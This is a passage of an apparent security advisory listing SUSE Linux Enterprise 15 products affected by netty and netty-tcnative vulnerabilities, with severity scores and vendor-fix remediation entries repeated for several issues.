| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
5.6 (Medium)
Affected products
Recommended
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
6.5 (Medium)
Affected products
Recommended
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
moderate
8.2 (High)
Affected products
Recommended
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
7.5 (High)
Affected products
Recommended
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP6-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP4:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP5:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server for SAP Applications 15 SP6:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
Threats
Impact
important
5.3 (Medium)
Affected products
Recommended
35 products
| Product | Identifier | Version | Remediation |
|---|---|---|---|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-ESPOS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise High Performance Computing 15 SP5-LTSS:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Development Tools 15 SP7:netty-tcnative-2.0.77-150200.3.39.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.ppc64le | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.s390x | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-4.1.133-150200.4.46.1.x86_64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Module for Package Hub 15 SP7:netty-javadoc-4.1.133-150200.4.46.1.noarch | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.aarch64 | — |
Vendor Fix
|
|
| Unresolved product id: SUSE Linux Enterprise Server 15 SP4-LTSS:netty-tcnative-2.0.77-150200.3.39.1.ppc64le | — |
Vendor Fix
|
|
